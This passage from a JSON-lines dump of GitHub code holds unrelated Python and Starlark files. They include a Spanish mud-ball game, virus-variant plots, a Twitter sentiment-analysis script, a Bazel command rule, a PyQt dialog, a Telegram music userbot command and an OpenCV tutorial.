Barro! El objetivo es darle al otro jugador con una bola de barro.\nIntroduce el ángulo (en grados) y la presión en PSI para cargar tu arma.\n \"\"\")\n \ndef calcular_distancia(psi, angulo_en_grados):\n \"\"\" Calcula la distancia que vuela la bola de barro. \"\"\"\n angulo_en_radianes = math.radians(angulo_en_grados)\n distancia = psi * math.sin(angulo_en_radianes) * 15\n return distancia\n \ndef obtener_datosdel_usuario(nombre):\n \"\"\" Obtiene del usuario los valores para la presión y el ángulo. Lo devuelve como una lista con dos \n números. \"\"\"\n # Más adelante, en el capítulo sobre 'excepciones', aprenderemos como\n # modificar este código para que no se cuelgue cuando el usuario escriba\n # algo que no sea un número válido.\n \n psi = float(input(nombre + \" ¿con cuántos psi cargamos el arma? \"))\n angulo = float(input(nombre + \" ¿con qué ángulo quieres apuntar el arma? \"))\n return psi, angulo\n \ndef obtener_nombres_jugadores():\n \"\"\" Obtenemos una lista con los nombres de los jugadores. \"\"\"\n print(\"Introduce los nombres de los jugadores. Puedes introducir cuantos quieras.\")\n hecho = False\n jugadores = []\n while not hecho:\n jugador = input(\"Introducir jugador (presiona intro para salir): \")\n if len(jugador) > 0:\n jugadores.append(jugador)\n else:\n hecho = True\n \n print() \n return jugadores\n \ndef procesa_turno_jugador(jugador_nombre, distancia_aparte):\n \"\"\" El código ejecuta el turno para cada jugador.\n Si devuelve False, continuamos con el juego.\n Si devuelve True, alguien ha ganado así que paramos. \"\"\"\n psi, angulo = entrada_usuario = obtener_datosdel_usuario(jugador_nombre) \n \n distancia_boladebarro = calcular_distancia(psi, angulo)\n diferencia = distancia_boladebarro - distancia_aparte\n \n # Si echamos un vistazo al capítulo de formatos de impresión, estas líneas\n # podrían imprimir números en un bonito formato.\n \n if diferencia > 1:\n print(\"Ha caído\", diferencia, \"metros muy lejos!\")\n elif diferencia < -1:\n print(\"Te has quedado\", diferencia * -1, \"metros corto!\")\n else:\n print(\"Bingo!\", jugador_nombre, \"gana!\")\n return True\n \n print()\n return False\n \ndef main():\n \"\"\" Programa Principal. \"\"\"\n \n # Comenzamos el juego.\n imprimir_instrucciones()\n jugador_nombres = obtener_nombres_jugadores()\n distancia_aparte = random.randrange(50, 150)\n \n # Se mantiene alerta hasta que alguien gana\n hecho = False\n while not hecho:\n # Iteramos para cada jugador\n for jugador_nombre in jugador_nombres:\n # Procesamos sus turnos\n hecho = procesa_turno_jugador(jugador_nombre, distancia_aparte)\n # Si alguien gana, 'rompemos' el bucle y finalizamos el juego.\n if hecho:\n break\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"JuanGutierrez43/RepoUNLa","sub_path":"Seminario de Lenguajes/Práctica/01.programarcadegames/Práctica25 Funciones juego.py","file_name":"Práctica25 Funciones juego.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"1653211679","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 10:30:26 2020\niSNV per sample peru\n@author: viro102\n\"\"\"\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os as os \n\n\n# PERU\n\n# SP032X\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/SP032X/2_peru/\")\nrep_b = pd.read_csv(\"2_peru_final.tsv\", sep=\"\\t\")\nrep_b= rep_b[rep_b['TOTAL_DP'] >= 400]\ng = sns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, fit_reg=False, \n hue='S_or_NS',aspect=20/8, legend=False, \n markers=[\"o\", \"x\"], scatter_kws={\"s\": 90})\n# legend title\nnew_title = 'Amino acid change'\ng._legend.set_title(new_title)\n# replace legend labels\nnew_labels = ['Synonymous', 'Non-synonymous']\nfor t, l in zip(g._legend.texts, new_labels): t.set_text(l)\n\n# resize figure box to -> put the legend out of the figure\nbox = g.ax.get_position() # get position of figure\ng.ax.set_position([box.x0, box.y0, box.width * 0.85, box.height]) # resize position\n\n# Put a legend to the right side\ng.ax.legend(loc='center right', bbox_to_anchor=(1.25, 0.5), ncol=1)\nsns.plt.show(g)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 2_peru', fontsize=20)\nplt.grid(axis=\"both\")\nplt.show()\n\n\n\n\n\n\n# SP032X\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/SP032X/2_peru/\")\nrep_b = pd.read_csv(\"2_peru_final.tsv\", sep=\"\\t\")\nrep_b= rep_b[rep_b['TOTAL_DP'] >= 400]\nsns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, hue='S_or_NS', fit_reg=False)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 2_peru', fontsize=20)\nplt.show()\n\n\n\n\n\n\n\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/outbreak_samples/GI.1/10_japan/\")\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nrep_a = pd.read_csv(\"10_japan_GI.1_final.tsv\", sep=\"\\t\")\nrep_a[\"S_NS\"] = np.where(rep_a[\"REF_AA\"] == rep_a[\"ALT_AA\"], \"S\", \"NS\")\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nrep_b=rep_a[rep_a['TOTAL_DP'] >= 400]\nsns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, fit_reg=False, hue='S_NS',aspect=14/5, \n legend=True, legend_out=True)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 10_miyagi', fontsize=20)\nplt.grid(axis=\"both\")\nplt.show()\n\n","repo_name":"kagningemma/sapovirus-evolution","sub_path":"scripts/NGS data analyses and plots/iSNV_plots.py","file_name":"iSNV_plots.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"72303570523","text":"# https://www.codingame.com/ide/puzzle/power-of-thor-episode-1\n\nimport sys\nimport math\n\nlight_x, light_y, initial_tx, initial_ty = [int(i) for i in input().split()]\n\nthor_x, thor_y = initial_tx, initial_ty\n\n# game loop\nwhile True:\n remaining_turns = int(input()) # The remaining amount of turns Thor can move. Do not remove this line.\n\n direction_x = \"\"\n direction_y = \"\"\n\n if thor_x > light_x:\n direction_x = \"W\"\n thor_x -= 1\n if thor_x < light_x:\n direction_x = \"E\"\n thor_x += 1\n\n if thor_y > light_y:\n direction_y = \"N\"\n thor_y -= 1\n if thor_y < light_y:\n direction_y = \"S\"\n thor_y += 1\n\n\n # A single line providing the move to be made: N NE E SE S SW W or NW\n print(direction_y + direction_x)\n","repo_name":"andazale/codingame","sub_path":"python/classic_puzzles_easy/powerofthor_ep1.py","file_name":"powerofthor_ep1.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6297415982","text":"\"\"\"\nThis is a simple rule for defining a runnable command that can be used in a\nmultirun definition\n\"\"\"\n\nload(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"//internal:constants.bzl\", \"RUNFILES_PREFIX\")\n\ndef _force_opt_impl(_settings, _attr):\n return {\"//command_line_option:compilation_mode\": \"opt\"}\n\n_force_opt = transition(\n implementation = _force_opt_impl,\n inputs = [],\n outputs = [\"//command_line_option:compilation_mode\"],\n)\n\ndef _command_impl(ctx):\n runfiles = ctx.runfiles().merge(ctx.attr._bash_runfiles[DefaultInfo].default_runfiles)\n\n for data_dep in ctx.attr.data:\n default_runfiles = data_dep[DefaultInfo].default_runfiles\n if default_runfiles != None:\n runfiles = runfiles.merge(default_runfiles)\n\n default_info = ctx.attr.command[0][DefaultInfo]\n executable = default_info.files_to_run.executable\n\n default_runfiles = default_info.default_runfiles\n if default_runfiles != None:\n runfiles = runfiles.merge(default_runfiles)\n\n expansion_targets = ctx.attr.data\n\n str_env = [\n \"export %s=%s\" % (k, shell.quote(ctx.expand_location(v, targets = expansion_targets)))\n for k, v in ctx.attr.environment.items()\n ]\n str_args = [\n \"%s\" % shell.quote(ctx.expand_location(v, targets = expansion_targets))\n for v in ctx.attr.arguments\n ]\n command_exec = \" \".join([\"exec ./%s\" % shell.quote(executable.short_path)] + str_args + ['\"$@\"\\n'])\n\n out_file = ctx.actions.declare_file(ctx.label.name + \".bash\")\n ctx.actions.write(\n output = out_file,\n content = \"\\n\".join([RUNFILES_PREFIX] + str_env + [command_exec]),\n is_executable = True,\n )\n return [\n DefaultInfo(\n files = depset([out_file]),\n runfiles = runfiles.merge(ctx.runfiles(files = ctx.files.data + [executable])),\n executable = out_file,\n ),\n ]\n\ncommand = rule(\n implementation = _command_impl,\n attrs = {\n \"arguments\": attr.string_list(\n doc = \"List of command line arguments. Subject to $(location) expansion. See https://docs.bazel.build/versions/master/skylark/lib/ctx.html#expand_location\",\n ),\n \"data\": attr.label_list(\n doc = \"The list of files needed by this command at runtime. See general comments about `data` at https://docs.bazel.build/versions/master/be/common-definitions.html#common-attributes\",\n allow_files = True,\n ),\n \"environment\": attr.string_dict(\n doc = \"Dictionary of environment variables. Subject to $(location) expansion. See https://docs.bazel.build/versions/master/skylark/lib/ctx.html#expand_location\",\n ),\n \"command\": attr.label(\n mandatory = True,\n allow_files = True,\n executable = True,\n doc = \"Target to run\",\n cfg = _force_opt,\n ),\n \"_bash_runfiles\": attr.label(\n default = Label(\"@bazel_tools//tools/bash/runfiles\"),\n ),\n \"_allowlist_function_transition\": attr.label(\n default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n ),\n },\n executable = True,\n)\n","repo_name":"aherrmann/rules_multirun","sub_path":"command.bzl","file_name":"command.bzl","file_ext":"bzl","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"86"} +{"seq_id":"29792037442","text":"\"\"\"\"\"\"\"\"\"\r\nTwitter Data Fetching Program!\r\nSave your credentials in the same folder as the program\r\nMake sure to use all the different functions I have presented!\r\nInstall all the modules below\r\nScroll down to If name statement - to enter a twitter username!\r\nBy Zain Iqbal\r\nComputer Science A level Project\r\nOriginally coded in Pycharm\r\n\r\n\"\"\"\"\"\"\"\"\"\r\n\r\n\r\n\r\nfrom tweepy import API\r\nfrom tweepy import Cursor\r\nfrom tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy import Stream\r\n\r\nfrom textblob import TextBlob\r\n\r\nimport twitter_credentials\r\n\r\nimport numpy as np # allow us to refer to anything from the numpy library by using the dot operator\r\nimport pandas as pd\r\nimport re\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nname = (input(\"hello, please enter your name\"))\r\nprint(\"Hello\", name)\r\n\r\n#twitter credentials\r\n\r\n\r\nfrom twitter_credentials import consumer_secret, consumer_key, access_token, access_secret\r\n\r\n\r\nclass TwitterClient():\r\n\r\n def __init__(self, twitter_user=None):\r\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\r\n self.twitter_client = API(self.auth)\r\n\r\n self.twitter_user = twitter_user # instaniate, allows user to specifiy a user to get timeline tweets from. default arguement is none, defaults to u\r\n\r\n def get_twitter_client_api(self):\r\n return self.twitter_client #new function that allows us to interface with this api and extract data from tweets\r\n\r\n\r\n\r\n def get_user_timeline_tweets(self, num_tweets): # how many tweets we want to extract or share\r\n tweets = [] # list\r\n for tweet in Cursor(self.twitter_client.user_timeline, id=self.twitter_user).items(num_tweets): # import cursor, class that allows us to get user timeline tweets\r\n tweets.append(tweet) #loop thru certain num of tweets and return to user, gets your own timeline tweets, tweets is the var stores the list\r\n return tweets\r\n\r\n\r\n def get_friend_list(self, num_friends):#determine how many friends are fetched\r\n friend_list = [] # defines list for given user ( no specification of user)\r\n for friend in Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends): # grabs id of friends, starts a loop\r\n friend_list.append(friend) #friends\r\n return friend_list\r\n\r\n\r\n def get_home_timeline_tweets(self, num_tweets): #twitter homepage tweet fetch for given user/yourself\r\n home_timeline_tweets = [] # list\r\n for tweet in Cursor(self.twitter_client.home_timeline, id=self.twitter_user).items(num_tweets):\r\n home_timeline_tweets.append(tweet)\r\n return home_timeline_tweets\r\n\r\n\r\n #these functions all have a similar flavor as to how they work, have a look and run below in the constructor!\r\n\r\n\r\n\r\nclass TwitterAuthenticator():\r\n def authenticate_twitter_app(self):\r\n auth = OAuthHandler(consumer_key, consumer_secret) # authentication\r\n auth.set_access_token(access_token, access_secret)\r\n return auth\r\n\r\n#abstract this functionality, authenticate for other purposes, new class for authentication\r\n# allows authentication of classes\r\n\r\n\r\n\r\n#twitter streamer\r\n\r\nclass TwitterStreamer():\r\n \r\n #Class for streaming and processing live tweets (from above)\r\n \r\n def __init__(self):\r\n self.twitter_authenticator = TwitterAuthenticator()\r\n\r\n def stream_tweets(self, fetched_tweets_filename, hash_tag_list):\r\n # This handles Twitter authentication and the connection to Twitter Streaming API\r\n listener = TwitterListener(fetched_tweets_filename)\r\n auth = self.twitter_authenticator.authenticate_twitter_app()\r\n stream = Stream(auth, listener)\r\n\r\n # This line filter Twitter Streams to capture data by the keywords:\r\n stream.filter(track=hash_tag_list)\r\n\r\n\r\n\r\n\r\nclass TweetAnalyzer():\r\n \"\"\"\r\n analyzing and categorizing content from tweets.\r\n \"\"\"\r\n\r\n def clean_tweet(self, tweet):\r\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\r\n # removing special characters from string and hyperlinks and returning the clean tweet\r\n\r\n def analyze_sentiment(self, tweet):#taken from textblob\r\n analysis = TextBlob(self.clean_tweet(tweet)) #object anaylsing the clean tweet\r\n\r\n if analysis.sentiment.polarity > 0: #anaylsis textblob provides, uses sentiment engine, is it pos or neg\r\n return 1 #indicates positive tweet\r\n elif analysis.sentiment.polarity == 0:\r\n return 0 #indicates neutral tweet\r\n else:\r\n return -1 #indicates the tweet is negative.\r\n\r\n\r\n\r\n\r\n\r\n def tweets_to_data_frame(self, tweets):#function that allows analysis of tweets and categorizes content from tweets\r\n df = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['tweets'])# these variables are precreated, refer to tweepy documentation for further info\r\n # looping through every single tweet, extract the text from the text of the tweet\r\n\r\n df['id'] = np.array([tweet.id for tweet in tweets])\r\n df['len'] = np.array([len(tweet.text) for tweet in tweets])\r\n df['date'] = np.array([tweet.created_at for tweet in tweets])\r\n df['source'] = np.array([tweet.source for tweet in tweets])\r\n df['likes'] = np.array([tweet.favorite_count for tweet in tweets])\r\n df['retweets'] = np.array([tweet.retweet_count for tweet in tweets])\r\n\r\n return df\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n twitter_client = TwitterClient()\r\n tweet_analyzer = TweetAnalyzer()\r\n\r\n api = twitter_client.get_twitter_client_api()\r\n\r\n tweets = api.user_timeline(screen_name=\"muftimenk\", count=1000000)# what user do you want to grab tweets from\r\n\r\n # print(dir(tweets[0]))\r\n # print(tweets[0].retweet_count)\r\n\r\n df = tweet_analyzer.tweets_to_data_frame(tweets) # creates dataframe based on function which is based on class\r\n df['sentiment'] = np.array([tweet_analyzer.analyze_sentiment(tweet) for tweet in df['tweets']])\r\n\r\n # Get average length over all tweets:\r\n print(\"average length of tweet from:\",np.mean(df['len']))\r\n\r\n # Get the number of likes for the most liked tweet:\r\n print(\"max likes of chosen user: \", np.max(df['likes']))\r\n\r\n # Get the number of retweets for the most retweeted tweet:\r\n print(\"max retweets of user:\" , np.max(df['retweets']))\r\n\r\nprint(df.head(10000))\r\n\"\"\"\"\"\"\"\"\"\r\n#Time Series\r\n\r\ntime_likes = pd.Series(data=df['likes'].values, index=df['date']) #created a times series object using panda, plotting user data\r\ntime_likes.plot(figsize=(16, 4), color='r')\r\nplt.show()\r\n\r\n\r\n\r\ntime_retweets = pd.Series(data=df['retweets'].values, index=df['date'])\r\ntime_retweets.plot(figsize=(16, 4), color='r')\r\nplt.show()\r\n\"\"\"\"\"\"\"\"\"\r\n\r\n\r\n #Layered Time Series - visualisation\r\n\r\ntime_likes = pd.Series(data=df['likes'].values, index=df['date'])\r\ntime_likes.plot(figsize=(14,4), label=\"likes\", legend=True) #box that shows what line corresponds to what label\r\n\r\ntime_retweets = pd.Series(data=df['retweets'].values, index=df['date']) # same thing for retweets\r\ntime_retweets.plot(figsize=(14,4), label=\"retweets\", legend=True) #plot for retweets\r\nplt.show() # see both lines together\r\n\r\n\r\n\r\n # Authenticate using config.py and connect to Twitter Streaming API.\r\n #hash_tag_list = [\"donal trump\", \"hillary clinton\", \"barack obama\", \"bernie sanders\"]\r\n #fetched_tweets_filename = \"tweets.txt\"\r\n\r\n #twitter_client = TwitterClient('pycon')# user specification, follow the @, extracts timeline tweet from another user\r\n #print(twitter_client.get_user_timeline_tweets(1)) #prints the function just created\r\n\r\n# twitter_streamer = TwitterStreamer() # method that we created above, file name and list of keywords\r\n# twitter_streamer.stream_tweets(fetched_tweets_filename, hash_tag_list)\r\n\r\n\r\n","repo_name":"zain278/Twitter-Data-Fetching-App","sub_path":"Twitter Data Fetching Program.py","file_name":"Twitter Data Fetching Program.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"45622725037","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom KdeQt import KQFileDialog\n\nfrom E4Gui.E4Completers import E4FileCompleter\n\nfrom Ui_AddProjectDialog import Ui_AddProjectDialog\n\nimport Utilities\n\nclass AddProjectDialog(QDialog, Ui_AddProjectDialog):\n \"\"\"\n Class implementing the add project dialog.\n \"\"\"\n def __init__(self, parent = None, startdir = None, project = None):\n \"\"\"\n Constructor\n \n @param parent parent widget of this dialog (QWidget)\n @param startdir start directory for the selection dialog (string or QString)\n @param project dictionary containing project data\n \"\"\"\n QDialog.__init__(self, parent)\n self.setupUi(self)\n \n self.fileCompleter = E4FileCompleter(self.filenameEdit)\n \n self.startdir = startdir\n \n self.__okButton = self.buttonBox.button(QDialogButtonBox.Ok)\n self.__okButton.setEnabled(False)\n \n if project is not None:\n self.setWindowTitle(self.trUtf8(\"Project Properties\"))\n \n self.filenameEdit.setReadOnly(True)\n self.fileButton.setEnabled(False)\n \n self.nameEdit.setText(project['name'])\n self.filenameEdit.setText(project['file'])\n self.descriptionEdit.setPlainText(project['description'])\n self.masterCheckBox.setChecked(project['master'])\n \n @pyqtSignature(\"\")\n def on_fileButton_clicked(self):\n \"\"\"\n Private slot to display a file selection dialog.\n \"\"\"\n startdir = self.filenameEdit.text()\n if startdir.isEmpty() and self.startdir is not None:\n startdir = self.startdir\n projectFile = KQFileDialog.getOpenFileName(\\\n self,\n self.trUtf8(\"Add Project\"),\n startdir,\n self.trUtf8(\"Project Files (*.e4p *.e4pz)\"),\n None)\n \n if not projectFile.isEmpty():\n self.filenameEdit.setText(Utilities.toNativeSeparators(projectFile))\n \n def getData(self):\n \"\"\"\n Public slot to retrieve the dialogs data.\n \n @return tuple of four values (string, string, boolean, string) giving the \n project name, the name of the project file, a flag telling, whether\n the project shall be the master project and a short description\n for the project\n \"\"\"\n return (unicode(self.nameEdit.text()), unicode(self.filenameEdit.text()), \n self.masterCheckBox.isChecked(), \n unicode(self.descriptionEdit.toPlainText()))\n \n @pyqtSignature(\"QString\")\n def on_nameEdit_textChanged(self, p0):\n \"\"\"\n Private slot called when the project name has changed.\n \"\"\"\n self.__updateUi()\n \n @pyqtSignature(\"QString\")\n def on_filenameEdit_textChanged(self, p0):\n \"\"\"\n Private slot called when the project filename has changed.\n \"\"\"\n self.__updateUi()\n \n def __updateUi(self):\n \"\"\"\n Private method to update the dialog.\n \"\"\"\n self.__okButton.setEnabled(not self.nameEdit.text().isEmpty() and \\\n not self.filenameEdit.text().isEmpty())\n","repo_name":"kunwijik/Spectroscopy_paper","sub_path":"eric4-4.5.24/eric/MultiProject/AddProjectDialog.py","file_name":"AddProjectDialog.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74016011804","text":"from datetime import datetime\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\ndef get_date_months_ago(months: int):\n today = datetime.today()\n three_months_ago = today - relativedelta(months=months)\n\n formatted_date = three_months_ago.strftime(\"%Y%m%d\")\n return formatted_date\n\ndef get_corporate_code(corp_name: str):\n file_path = \"/config/workspace/ChatGPT-plugin-test/plugin/dart/corpcode.json\"\n with pd.read_json(file_path, lines=True, chunksize=300) as reader:\n for idx, chunk in enumerate(reader):\n ret = chunk.loc[chunk['corp_name'] == corp_name, \"corp_code\"]\n if ret.empty:\n continue\n corp_code = ret.item()\n return str(corp_code).rjust(8, '0') \n return None\n\ndef etree_to_text_list(t):\n text_list = []\n if t.text:\n text = t.text.strip()\n if text:\n text_list.append(text)\n for child in t:\n text_list.extend(etree_to_text_list(child))\n return text_list\n\ndef convert_etree_to_text(etree_obj):\n text_list = etree_to_text_list(etree_obj)\n return \" \".join(text_list)","repo_name":"sehwan505/DART-ChatGPT-PLUGIN","sub_path":"plugin/dart/dart_util.py","file_name":"dart_util.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39275328523","text":"import os\nimport asyncio\nfrom pyrogram import Client\nfrom AsadAlexaVCBot.queues import QUEUE, add_to_queue\nfrom config import bot, call_py, HNDLR, contact_filter, GRPPLAY\nfrom pyrogram import filters\nfrom pyrogram.types import Message\nfrom pytgcalls import StreamType\nfrom pytgcalls.types.input_stream import AudioPiped\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\n\n\n@Client.on_message(filters.command([\"playfrom\"], prefixes=f\"{HNDLR}\"))\nasync def playfrom(client, m: Message):\n if GRPPLAY or (m.from_user and m.from_user.is_contact) or m.outgoing:\n chat_id = m.chat.id\n if len(m.command) < 2:\n await m.reply(\n \"**USAGE:** \\n\\n`/playfrom [chat_id/username]` \\n`/playfrom [chat_id/username] ; [no. of songs]`\"\n )\n else:\n args = m.text.split(maxsplit=1)[1]\n if \";\" in args:\n chat = args.split(\";\")[0]\n limit = int(args.split(\";\")[1])\n else:\n chat = args\n limit = 10\n hmm = await m.reply(f\"Searching the last **{limit}** Songs from `{chat}`\")\n try:\n async for x in bot.search_messages(chat, limit=limit, filter=\"audio\"):\n location = await x.download()\n if x.audio.title:\n songname = x.audio.title[:30] + \"...\"\n else:\n if x.audio.file_name:\n songname = x.audio.file_name[:30] + \"...\"\n else:\n songname = \"Audio\"\n link = x.link\n if chat_id in QUEUE:\n add_to_queue(chat_id, songname, location, link, \"Audio\", 0)\n else:\n await call_py.join_group_call(\n chat_id,\n AudioPiped(location),\n stream_type=StreamType().pulse_stream,\n )\n add_to_queue(chat_id, songname, location, link, \"Audio\", 0)\n await m.reply(\n f\"**Started Playing Songs from {chat} â–¶** \\n**🎧 SONG** : [{songname}]({link}) \\n**💬 CHAT** : `{chat_id}`\",\n disable_web_page_preview=True,\n )\n await hmm.delete()\n await m.reply(f\"Added **{limit}** SONGS to Queue\")\n except Exception as e:\n await hmm.edit(f\"**ERROR** \\n`{e}`\")\n","repo_name":"TheTeamAlexa/AlexaMusic-Userbot","sub_path":"AsadAlexaVCBot/playfrom.py","file_name":"playfrom.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"71293082204","text":"# 0. Loading libraries\nimport cv2 as cv # Import python-supported OpenCV functions.\n#import matplotlib.pylab as plt # Import matplotlib.\nimport numpy as np # Import numpy.\n#from skimage import io\n###############################################################################\n# 1. Read and show an image\n# This is how you define a function. You don't need to define the type of the\n# parameters, just write them, the python compiler will find out automatically\n# their type.\ndef example_1():\n # Python list style.\n images = [\n # Loads the image from the given path with its default colors. I think that\n # without option and using IMREAD_COLOR has the same result.\n cv.imread('cook.jpg'),\n # cv.imread('cook.jpg', cv.IMREAD_COLOR),\n # Loads the image from the given path with grayscale colors.\n cv.imread('cook.jpg', cv.IMREAD_GRAYSCALE)\n ]\n cv.namedWindow('Example 1', cv.WINDOW_AUTOSIZE)\n # For-loop: loop through each element of images saving the value of\n # each iteration in img:\n for img in images:\n # Shows the image.\n cv.imshow('Example 1', img)\n # Shows the object type of the image. The fstrings (f'...') have the same\n # behavior as echo \"$var\", but instead of $var or ${var}, is {var}.\n print(f'Type: {type(img)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n print(f'Dimensions: {img.shape}') \n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 1') # cv2.destroyAllWindows()\n\n# example_1()\n###############################################################################\n# 2. Import and show an image. Not working, needs skimage, and the installation\n# gives an error.\n#def example_2():\n # Loads image from a given url. The image is read in BGR format:\n #image = io.imread('https://i.kym-cdn.com/photos/images/newsfeed/002/488/664/964.jpg')\n # Shows the image:\n # - With cvtColor, converts the image from BGR to RGB (option COLOR_BGR2RGB).\n # - With hconcat, puts both images next to each other horizontally.\n #cv.namedWindow('Example 2', cv.WINDOW_AUTOSIZE)\n #cv.imshow('Example 2', cv.hconcat((image, cv.cvtColor(image, cv.COLOR_BGR2RGB))))\n # Shows the object type of the image.\n #print(f'Type: {type(image)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n #print(f'Dimensions: {image.shape}')\n # Waits until any key is pressed.\n #cv.waitKey(0)\n # Destroys the window.\n #cv.destroyWindow('Example 1') # cv2.destroyAllWindows()\n\n# example_2()\n###############################################################################\n# 3. Images are matrices:\ndef imshow_properties(img, window):\n # Shows the image.\n cv.imshow(window, img)\n print('Properties of an image matrix:')\n # Shows the object type of the image.\n print(f'Type: {type(img)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n print(f'Dimensions (width, height, channels): {img.shape}')\n # Shows the number of pixels.\n print(f'Number of pixels: {img.size}')\n # Shows the image datatype.\n print(f'Image datatype: {img.dtype}')\n\ndef example_3():\n # An image is a matrix of values as we could see in previous examples:\n # Python list style.\n images = [\n # Loads the image from the given path with its default colors.\n cv.imread('cat.jpg'),\n # Loads the image from the given path with grayscale colors.\n cv.imread('cat.jpg', cv.IMREAD_GRAYSCALE)\n ]\n # Open a new window named 'Example 3'.\n cv.namedWindow('Example 3', cv.WINDOW_AUTOSIZE)\n # For-loop: loop through each element of images saving the value of\n # each iteration in img:\n for img in images:\n imshow_properties(img, 'Example 3')\n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 3') # cv2.destroyAllWindows()\n\n# example_3()\n###############################################################################\n# 4. Images matrices creation\ndef example_4():\n # Ways of initialize a matrix\n # BE CAREFUL with the sizes.\n width = 480 # The width is the number of columns.\n height = 320 # The height is the number of rows.\n channels = 1 # 1 if grayscale, 3 if RGB or BGR.\n # GRAYSCALE IMAGES\n grayscale_images = [\n # Creates a 3rd-dim array and fills it with 0. When calling a function, you\n # can write the name of the parameter (dtype = 'uint8') or ignore it\n # ('uint8'). Sirve para llamar a la función unicamente con los parámetros \n # que te interesen, a lo mejor solo quieres usar dos parámetros de una\n # función de 5 parámetros y ambos parámetros estan en los extremos. Al igual\n # que en C++, Python va a procesar los parámetros uno por uno y en orden,\n # pero si le pones el nombre, le dará el valor al parámetro que has\n # declarado y no al siguiente que debería tocarle.\n np.zeros((height, width, channels), dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with a given value (255).\n np.full((height, width, channels), 255, dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with random values (between 0-256).\n np.random.randint(0, 256, (height, width, channels), dtype = 'uint8')\n ]\n\n # RGB/BGR IMAGES\n channels = 3\n rgb_images = [\n # Creates a 3rd-dim array and fills it with 0.\n np.zeros((height, width, channels), dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with a given value (255).\n np.full((height, width, channels), 255, dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with random values (between 0-256).\n np.random.randint(0, 256, (height, width, channels), dtype = 'uint8')\n ]\n # Open a new window named 'Example 3'.\n cv.namedWindow('Example 4', cv.WINDOW_AUTOSIZE)\n for img_gs in grayscale_images:\n imshow_properties(img_gs, 'Example 4')\n if cv.waitKey(0) == 27:\n break\n\n for img_rgb in rgb_images:\n imshow_properties(img_rgb, 'Example 4')\n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 4') # cv2.destroyAllWindows()\n\n # You can also modify individual elements or regions of the image (matrix):\n # Init only one channel (0 -> R, 1 -> G, 2 -> B):\n # - [75,75,0]: each elements indicates the dimensions, ergo [row, column, channel].\n rgb_images[0][75,75,0] = 255\n # Init each channel:\n # - [75,75]: dimensions can be omited but you'll need to initialize the previous \n # dimension with a list with its size equally to the omited dimension.\n rgb_images[0][75,75] = [255,255,255]\n # Init a region only in one channel:\n rgb_images[0][0:75, 0:75, 0] = 255\n # Init a region in each channel:\n rgb_images[0][45:105, 45:105] = [255,255,255]\n return rgb_images\n\n# imgs = example_4()\n###############################################################################\n# 5. Image matrices operations\ndef example_5(imgs):\n # Creates a reference. If modified, will modify the original too.\n ref = imgs[2]\n # Creates a new whole variable.\n cpy = imgs[2].copy()\n # ADD, SUB, MUL\n cpy += 5 # Tambien vale con *=, /=. Aplica la operacion a toda la matriz.\n cpy = (imgs[0] - 1) * 3 - imgs[2] # Solo es un ejemplo.\n # Identity matrix\n idy = np.eye(3, dtype = 'float32')\n # One dimension array 